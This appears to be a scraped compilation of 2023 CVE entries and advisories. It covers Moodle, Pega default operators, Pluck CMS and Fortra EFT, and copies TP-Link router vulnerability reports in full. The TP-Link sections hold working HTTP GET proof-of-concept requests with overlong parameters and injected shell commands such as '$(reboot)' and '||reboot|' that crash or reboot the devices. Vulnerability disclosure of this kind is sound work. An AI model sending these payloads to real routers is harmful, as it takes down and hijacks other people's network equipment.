A limited SQL injection risk was identified on the Mnet SSO access control page. This flaw affects Moodle versions 4.2, 4.1 to 4.1.3, 4.0 to 4.0.8, 3.11 to 3.11.14, 3.9 to 3.9.21 and earlier unsupported versions.

CVE-2023-35132

Pega platform clients who are using versions 6.1 through 8.8.3 and have upgraded from a version prior to 8.x may be utilizing default credentials.

Pega continually works to implement security controls designed to protect client environments. With this focus, Pega has recently identified a security vulnerability that is rated **High** on the CVSS scale. 

We would like to thank **Mohamad Shokor** for working with us to help protect our clients regarding Default Operators.  Pega issued this Security Advisory to remind clients of our leading practices as found in our installation and security checklist guides. 

Issue

Description

Impact

C23

Default Operators

Default Operators have been identified by OWASP as a security threat, as they can be accompanied by known user/password combinations.

Default Operators are shipped as disabled in Pega Infinity 8.X versions and will be removed for new Pega Infinity ‘23 deployments. Clients who have upgraded from a version prior to 8.x may be affected.

The researcher contacted clients who had not changed the passwords of their default operators.

For all clients, guidance is being provided as follows:  https://docs.pega.com/bundle/platform-88/page/platform/security/securit….

To prevent unauthorized access with default passwords, change the passwords for all default operators. Disable or delete the operator IDs that you do not plan to use.  
Note: The passwords should be changed for disabled operators as well. 

It is very important to keep your Pega systems current on the latest patch releases.

For more detailed information, please review your **Client Advisory, \[CAD-\] case that was provided to your security and administrator contacts on April 24, 2023,** in My Support Portal**.** 

 **CVE Details**

CVE Details

C23

Software / Product   

Pega Platform 

Affected Versions         

From 6.1 to 8.8.X

CVE ID

CVE-2023-28094      

CVSS Rating

8.1

Description

Default Operators

CVE-2023-28094: Support Center

When using local accounts for administration, the redirect url parameter was not encoded correctly, allowing for an XSS attack providing admin login.



CVE-2023-28800

An issue discovered in /admin.php in Pluck CMS 4.7.15 through 4.7.16-dev5 allows remote attackers to run arbitrary code via manage file functionality.

CVE-2023-27083

TP-Link TL-WR940N V4, TL-WR841N V8/V10, TL-WR940N V2/V3 and TL-WR941ND V5/V6 were discovered to contain a buffer overflow in the component /userRpm/QoSRuleListRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

**TP-Link TL-WR940N/TL-WR841N/TL-WR941ND wireless router /userRpm/QoSRuleListRpm buffer read out-of-bounds vulnerability****1 Basic Information**

*   Vulnerability Type: Buffer read out-of-bounds
*   Vulnerability Description: A buffer overflow vulnerability exists in TP-Link TL-WR940N V4, TP-Link TL-WR841N V8/V10, TP-Link TL-WR940N V2/V3 and TP-Link TL-WR941ND V5/V6 wireless router. Its /userRpm/QoSRuleListRpm implementation has a security vulnerability in processing the protocol GET key parameters, allowing remote attackers to submit special requests through the vulnerability, causing buffer out-of-bounds read errors, which may lead to memory-sensitive information leakage and denial of service.
*   Device model:
    *   TP-Link TL-WR940N V4
    *   TP-Link TL-WR841N V8/V10
    *   TP-Link TL-WR940N V2/V3
    *   TP-Link TL-WR941ND V5/V6

**2 Vulnerability Value**

*   Maturity of Public Information: None
    
*   Order of Public Vulnerability Analysis Report: None
    
*   Stable reproducibility: yes
    
*   Vulnerability Score (refer to CVSS)
    
    *   V2：8.5 High AV:N/AC:M/Au:S/C:C/I:C/A:C
    *   V3.1：9.1 High AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
*   Exploit Conditions
    
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of Exploit
        *   Permission Constraints: authentication is required
        *   User Interaction: No victim interaction required
    *   Scope of Impact: Changed (may affect other components than vulnerable ones)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of vulnerability exploitation: Stable recurrence
    *   Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory
*   Exploit Effect
    
    *   Denial of Service

**3 PoC**

The PoC of TP-Link TL-WR940N is as follows:

GET /IOCGBYQCLXJSWZMC/userRpm/QoSRuleListRpm.htm?enable=true&start\_ip\_addr=192.168.0.4&end\_ip\_addr=192.168.0.6&start\_port=17&end\_port=20&protocolaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=0&min\_up\_band\_width=0&max\_up\_band\_width=0&min\_down\_band\_width=0&max\_down\_band\_width=0&Save=Save&curEditId=0&Page=1 HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://127.0.0.1:8081/IOCGBYQCLXJSWZMC/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR841N V10 is as follows:

GET /CTVJVVOCIAAMCXNC/userRpm/QoSRuleListRpm.htm?enable=true&start\_ip\_addr=192.168.0.4&end\_ip\_addr=192.168.0.6&start\_port=2&end\_port=4&$(\`reboot\`)=0&min\_up\_band\_width=0&max\_up\_band\_width=0&min\_down\_band\_width=0&max\_down\_band\_width=0&Save=Save&curEditId=0&Page=1 HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://127.0.0.1:8081/CTVJVVOCIAAMCXNC/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR940N V2/TL-WR941ND V5 is as follows:

GET /MZKBGETBFITRVSAA/userRpm/QoSRuleListRpm.htm?enable=true&start\_ip\_addr=192.168.0.3&end\_ip\_addr=192.168.0.34&start\_port=21&end\_port=24&protocol|reboot;=0&min\_up\_band\_width=12&max\_up\_band\_width=21&min\_down\_band\_width=12&max\_down\_band\_width=21&Save=Save&curEditId=0&Page=1 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/ZRCEHZIAURWJWDTC/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR940N V3/TL-WR941ND V6 is as follows:

GET /IOCGBYQCKLVYFARA/userRpm/QoSRuleListRpm.htm?enable=true&start\_ip\_addr=192.168.0.9&end\_ip\_addr=192.168.0.11&start\_port=12&end\_port=21&||reboot;=0&min\_up\_band\_width=10&max\_up\_band\_width=30&min\_down\_band\_width=10&max\_down\_band\_width=30&Save=Save&curEditId=0&Page=1 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/WRKWVQRABLAJMDEB/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR841N V8 is as follows:

GET /userRpm/QoSRuleListRpm.htm?enable=true&start\_ip\_addr=192.168.0.3&end\_ip\_addr=192.168.0.5&start\_port=23&end\_port=45&protocol&&reboot=0&min\_up\_band\_width=10&max\_up\_band\_width=100&min\_down\_band\_width=0&max\_down\_band\_width=0&Save=Save&curEditId=0&Page=1 HTTP/1.1
Host: 0.0.0.0:49169
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://0.0.0.0:49169/userRpm/QoSRuleCfgRpm.htm?Add=Add&Page=1
Cookie: Authorization=
Upgrade-Insecure-Requests: 1

**4 Vulnerability Principle**

When the Web management component receives a GET request, its /userRpm/QoSRuleListRpm component implements a security vulnerability in processing the protocol GET key parameter. The length of the parameter key of protocol can be any length and it is put into the stack without any boundary check, resulting in a read out-of-bounds. An attacker can exploit this vulnerability to overwrite the return address, which may lead to the disclosure of memory-sensitive information and denial of service.

The firmware is simulated by means of simulation, the simulation process and interface are as follows:

 After sending the PoC, a buffer read out-of-bounds memory error occurred, encountered an unexpected fatal signal 11 error and a BadVA error, causing the program to crash.

**5\. The basis for judging as a 0-day vulnerability**

Search the QoSRuleListRpm keyword in the NVD database, and no vulnerabilities are found (the same series of vulnerabilities can be found by directly searching the interface name to find related historical vulnerabilities).

Search the QoSRuleListRpm keyword in the CNVD database, and no vulnerabilities are found (the same series of vulnerabilities can be found by directly searching the interface name to find related historical vulnerabilities).

CVE-2023-36359: iotvul/tp-link/8/TP-Link TL-WR940N TL-WR841N TL-WR941ND wireless router userRpmQoSRuleListRpm buffer read out-of-bounds vulnerability.md at main · a101e-IoTvul/iotvul

TP-Link TL-WR940N V2/V3/V4, TL-WR941ND V5/V6, TL-WR743ND V1 and TL-WR841N V8 were discovered to contain a buffer overflow in the component /userRpm/AccessCtrlAccessTargetsRpm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

**TP-Link TL-WR940N/TL-WR941ND/TL-WR743ND/TL-WR841N wireless router /userRpm/AccessCtrlAccessTargetsRpm buffer read out-of-bounds vulnerability****1 Basic Information**

*   Vulnerability Type: Buffer read out-of-bounds
*   Vulnerability Description: A buffer overflow vulnerability exists in TP-Link TL-WR940N V2/V3/V4,TP-Link TL-WR941ND V5/v6, WR743ND V1 and TP-Link TL-WR841N V8 wireless router. Its /userRpm/AccessCtrlAccessTargetsRpm component has a security vulnerability in processing Changed GET key parameters, allowing remote attackers to submit special requests through the vulnerability, causing buffer out-of-bounds read errors, which may lead to memory-sensitive information leakage and denial of service.
*   Device model:
    *   TP-Link TL-WR940N V4
    *   TP-Link TL-WR940N V2/V3
    *   TP-Link TL-WR941ND V5/V6
    *   TP-Link TL-WR743ND V1
    *   TP-Link TL-WR841N V8

**2 Vulnerability Value**

*   Maturity of Public Information: None
    
*   Order of Public Vulnerability Analysis Report: None
    
*   Stable reproducibility: yes
    
*   Vulnerability Score (refer to CVSS)
    
    *   V2：7.1 High AV:N/AC:H/Au:S/C:C/I:C/A:C
    *   V3.1：8.6 High AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
*   Exploit Conditions
    
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of Exploit
        *   Permission Constraints: authentication is required
        *   User Interaction: No victim interaction required
    *   Scope of Impact: Changed (may affect other components than vulnerable ones)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of vulnerability exploitation: Stable recurrence
    *   Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory
*   Exploit Effect
    
    *   Denial of Service

**3 PoC**

The PoC of TP-Link TL-WR940N V4 is as follows:

GET /HJIHOAFAGMOPWGIA/userRpm/AccessCtrlAccessTargetsRpm.htm?target\_type=1&targets\_lists\_name=test&dst\_ip\_start=192.168.2.100&dst\_ip\_end=192.168.2.199&dst\_port\_start=20&dst\_port\_end=22&proto=0&Commonport=0&url\_0=&url\_1=&url\_2=&url\_3=&||reboot=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.2.139:52911
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.2.139:52911/HJIHOAFAGMOPWGIA/userRpm/AccessCtrlAccessTargetsRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR940N V2/TL-WR941ND V5 is as follows:

GET /MZKBGETBOHFWYCNC/userRpm/AccessCtrlAccessTargetsRpm.htm?target\_type=1&targets\_lists\_name=1&dst\_ip\_start=192.168.0.5&dst\_ip\_end=192.168.0.18&dst\_port\_start=12&dst\_port\_end=21&proto=1&Commonport=0&url\_0=&url\_1=&url\_2=&url\_3=&;reboot=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/ZRCEHZIAURWJWDTC/userRpm/AccessCtrlAccessTargetsRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR940N V3/TL-WR941ND V6 is as follows:

GET /IOCGBYQCUFENISDA/userRpm/AccessCtrlAccessTargetsRpm.htm?target\_type=1&targets\_lists\_name=1&dst\_ip\_start=192.168.0.5&dst\_ip\_end=192.168.0.18&dst\_port\_start=80&dst\_port\_end=32&proto=1&Commonport=4&url\_0=&url\_1=&url\_2=&url\_3=&;reboot|=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/WRKWVQRABLAJMDEB/userRpm/AccessCtrlAccessTargetsRpm.htm?Add=Add&Page=1
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link WR743ND is as follows:

GET /userRpm/AccessCtrlAccessTargetsRpm.htm?target\_type=1&targets\_lists\_name=soiefhsipf&dst\_ip\_start=192.168.1.4&dst\_ip\_end=192.168.1.33&dst\_port\_start=12&dst\_port\_end=23&proto=0&Commonport=0&url\_0=&url\_1=&url\_2=&url\_3=&Changed||reboot|=0&SelIndex=0&Page=1&Save=Save HTTP/1.1
Host: 0.0.0.0:49156
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://0.0.0.0:49156/userRpm/AccessCtrlAccessTargetsRpm.htm?Add=Add&Page=1
Upgrade-Insecure-Requests: 1

The PoC of TP-Link WR841N V8 is as follows:

GET /userRpm/AccessCtrlAccessTargetsRpm.htm?target\_type=1&targets\_lists\_name=wefzerg&dst\_ip\_start=192.168.0.4&dst\_ip\_end=192.168.0.33&dst\_port\_start=24&dst\_port\_end=45&proto=0&Commonport=0&url\_0=&url\_1=&url\_2=&url\_3=&|reboot|=0&SelIndex=0&fromAdd=0&Page=1&Save=Save HTTP/1.1
Host: 0.0.0.0:49169
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Referer: http://0.0.0.0:49169/userRpm/AccessCtrlAccessTargetsRpm.htm?Add=Add&Page=1
Cookie: Authorization=
Upgrade-Insecure-Requests: 1

**4 Vulnerability Principle**

When the Web management component receives a GET request, its /userRpm/AccessCtrlAccessTargetsRpm component has a security vulnerability in processing the Changed GET key parameter. The Changed parameter itself is put into the stack without being checked, resulting in a denial of service. An attacker exploits the Changed parameter of this vulnerability to cause a buffer out-of-bounds read error, which may lead to memory-sensitive information disclosure and denial of service. Attackers can use this vulnerability to directly achieve the effect of denial of service attacks.

The firmware simulation process and interface are as follows:

After sending the constructed PoC, the cache area read out of bounds and a BadVA error occurred, resulting in denial of service.

**5\. The basis for judging as a 0-day vulnerability**

Searching the AccessCtrlAccessTargetsRpm keyword in the NVD database did not find any vulnerabilities; searching the firmware model + parameter Changed keyword in the NVD database did not find any vulnerabilities, so it is considered a 0-day vulnerability.

CVE-2023-36358: iotvul/tp-link/6/TL-WR940N_WR941ND_WR743ND_WR841N_userRpm_AccessCtrlAccessTargetsRpm.md at main · a101e-IoTvul/iotvul

An issue in the /userRpm/LocalManageControlRpm component of TP-Link TL-WR940N V2/V4/V6, TL-WR841N V8/V10, and TL-WR941ND V5 allows attackers to cause a Denial of Service (DoS) via a crafted GET request.

**TP-Link TL-WR941ND/TL-WR940N/TL-WR841N wireless router /userRpm/LocalManageControlRpm denial of service vulnerability****1 Basic Information**

*   Vulnerability Type: Denial of Service
*   Vulnerability Description: A denial of service vulnerability exists in TP-Link TL-WR940N V2/V4/V6 and TL-WR841N V8/V10、TL-WR941ND V5 wireless router. Its /userRpm/LocalManageControlRpm component has a security vulnerability in processing enableWhitelist GET key parameters, allowing remote attackers to submit special requests through the vulnerability, causing denial of service.
*   Device model:
    *   TP-Link TL-WR940N V2/V4/V6、TP-Link TL-WR841N V8/V10、TP-Link TL-WR941ND V5

**2 Vulnerability Value**

*   Maturity of Public Information: None
    
*   Order of Public Vulnerability Analysis Report: None
    
*   Stable reproducibility: yes
    
*   Vulnerability Score (refer to CVSS)
    
    *   V2：7.1 High AV:N/AC:H/Au:S/C:C/I:C/A:C
    *   V3.1：8.6 High AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
*   Exploit Conditions
    
    *   Attack Vector Type: Network
    *   Attack Complexity: Low
    *   Complexity of Exploit
        *   Permission Constraints: authentication is required
        *   User Interaction: No victim interaction required
    *   Scope of Impact: Changed (may affect other components than vulnerable ones)
    *   Impact Indicators:
        *   Confidentiality: High
        *   Integrity: High
        *   Availability: High
    *   Stability of vulnerability exploitation: Stable recurrence
    *   Whether the product default configuration: There are vulnerabilities in functional components that are enabled out of the factory
*   Exploit Effect
    
    *   Denial of Service

**3 PoC**

The PoC of TP-Link WR940N V4 is as follows:

GET /WGJHXFTBPSHJAMDA/userRpm/LocalManageControlRpm.htm?enableWhitelist=1;CMD=$"reboot";$CMD&mac0=1C-BF-C0-7A-E0-03&mac1=1C-BF-C0-7A-E0-04&mac2=&mac3=&Save=Save HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://127.0.0.1:8081/WGJHXFTBPSHJAMDA/userRpm/LocalManageControlRpm.htm
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link WR940N V2 is as follows:

GET /WUKQJMSAEYQDMRRC/userRpm/LocalManageControlRpm.htm?enableWhitelist=1|aaa;&mac0=7e-54-76-ee-db-12&mac1=&mac2=&mac3=&Save=Save HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/KMODQNKANSQJBYFA/userRpm/LocalManageControlRpm.htm
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link WR940N V6 is as follows:

GET /IOCGBYQCUCBTYUKA/userRpm/LocalManageControlRpm.htm?enableWhitelist=1;CMD=$'reboot';$CMD&mac0=7e-54-76-ee-db-12&mac1=2A-6A-BC-86-FE-C2&mac2=&mac3=&Save=Save HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/XKZTZRGANXFYRCCA/userRpm/LocalManageControlRpm.htm
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR941ND V5 is as follows:

GET /MZKBGETBOHFWYCNC/userRpm/LocalManageControlRpm.htm?enableWhitelist=1||reboot|&mac0=7e-54-76-ee-db-12&mac1=&mac2=&mac3=&Save=Save HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://192.168.0.1/YOKQCLEBKGHAVJDB/userRpm/LocalManageControlRpm.htm
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR841N V8 is as follows:

GET /userRpm/LocalManageControlRpm.htm?enableWhitelist=1;CMD=$'reboot';$CMD&mac0=F6-33-2C-E7-94-C3&mac1=&mac2=&mac3=&Save=Save HTTP/1.1
Host: 0.0.0.0:49168
User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://0.0.0.0:49168/userRpm/LocalManageControlRpm.htm
Cookie: Authorization=
Upgrade-Insecure-Requests: 1

The PoC of TP-Link TL-WR841N V10 is as follows:

GET /BTYXMWXBISLZRVGB/userRpm/LocalManageControlRpm.htm?enableWhitelist=1$(reboot)&mac0=1C-BF-C0-7A-E0-04&mac1=7E-F8-60-02-2E-B8&mac2=&mac3=&Save=Save HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://127.0.0.1:8081/BMKHACLAYMEWMEQA/userRpm/LocalManageControlRpm.htm
Cookie: Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D
Upgrade-Insecure-Requests: 1

**4 Vulnerability Principle**

When the Web management component receives a GET request, its /userRpm/LocalManageControlRpm component has a security vulnerability in processing the enableWhitelist GET key parameter. The enableWhitelist parameter itself is put into the stack without being checked, resulting in a denial of service. An attacker exploits this vulnerability to construct a payload of the enableWhitelist parameter, so that the carefully constructed parameter causes a denial of service. Attackers can directly achieve the effect of denial of service by exploiting this vulnerability.

The firmware simulation process and interface are as follows:

After sending the constructed PoC, denial of service occurred.

**5\. The basis for judging as a 0-day vulnerability**

Searching the LocalManageControlRpm keyword in the NVD database did not find any vulnerabilities; searching the parameter enableWhitelist keyword in the NVD database did not find any vulnerabilities, so it is considered a 0-day vulnerability.

CVE-2023-36357: iotvul/tp-link/5/TL-WR941ND_TL-WR940N_TL-WR841N_userRpm_LocalManageControlRpm.md at main · a101e-IoTvul/iotvul

Fortra Globalscape EFT versions before 8.1.0.16 suffer from a denial of service vulnerability, where a compressed message that decompresses to itself can cause infinite recursion and crash the service


*   Home
*   »
*   Knowledgebase
*   »
*   EFT
*   »
*   Is EFT susceptible to the "Denial of service via recursive...

**THE INFORMATION IN THIS ARTICLE APPLIES TO:**

*   EFT v8.0.0.38 and 8.0.x
*   This is fixed in EFT v8.1.0.16

**QUESTION**

Is EFT susceptible to the "Denial of service via recursive Deflate Stream" vulnerability?

**ANSWER**

Yes, you can be vulnerable if you are:

*   Administering EFT remotely
*   Allowing EFT remote administration to be initiated from the Internet
*   Using the default port
*   Not whitelisting trusted IPs

**MORE INFORMATION**

Sending a recursively compressed packet (a "quine") to the administration port can crash EFT. This can be mitigated by limiting access to administer EFT at the network level. You may be affected if you allow remote administration to EFT to be initiated from the internet. As stated in our best practices, do not expose port 1100 to the internet. You will always want to whitelist trusted IPs. The most secure method is to disallow remote administration outside of the host EFT server and only login in via localhost (::1 or 127.0.0.1).

**Share Article**

*   
*   

On a scale of 1-5, please rate the helpfulness of this article

Optionally provide additional feedback to help us improve this article...

**Thank you for your feedback!**

Last Modified: Last Week

Last Modified By: kmarsh

Type: HOTFIX

Article not rated yet.

Article has been viewed 2.7K times.

CVE-2023-2990: Is EFT susceptible to the "Denial of service via recursive Deflate Stream" vulnerability?

Fortra Globalscape EFT versions before 8.1.0.16 suffer from an out of bounds memory read in their administration server, which can allow an attacker to crash the service or bypass authentication if successfully exploited


**THE INFORMATION IN THIS ARTICLE APPLIES TO:**

*   EFT v8.0.x - 8.1.0.14
*   This is fixed in v8.1.0.16

**QUESTION**

Is EFT susceptible to the "Authentication Bypass via Out-of-bounds Memory Read " vulnerability?

**ANSWER**

The possibility exists for malicious login attempts to eventually be mistaken as valid when a request is read beyond the payload buffer. Properly configured auto banning rules can avoid this type of attack. This is not a practical concern unless the administration port is exposed to external networks. This is even less of a concern if you are whitelisting expected IPs via the IP ban/access list for remote administration.

Yes, you can be vulnerable if you are:

*   Administering EFT remotely
*   Allowing EFT remote administration to be initiated from the Internet
*   Using the default admin port
*   Not whitelisting trusted IPs

**MORE INFORMATION**

This can be mitigated by limiting access to administer EFT at the network level. You may be affected if you allow remote administration to EFT to be initiated from the internet. As stated in our best practices, do not expose port 1100 to the internet. You will always want to whitelist trusted IP accesses. The most secure method is to disallow remote administration outside of the host EFT server and only login in via localhost, that is, ::1 or 127.0.0.1.

CVE-2023-2989: Is EFT susceptible to the "Authentication Bypass via Out-of-bounds Memory Read " vulnerability?

Fortra Globalscape EFT's administration server suffers from an information disclosure vulnerability where the serial number of the harddrive that Globalscape is installed on can be remotely determined via a "trial extension request" message


Source

CVE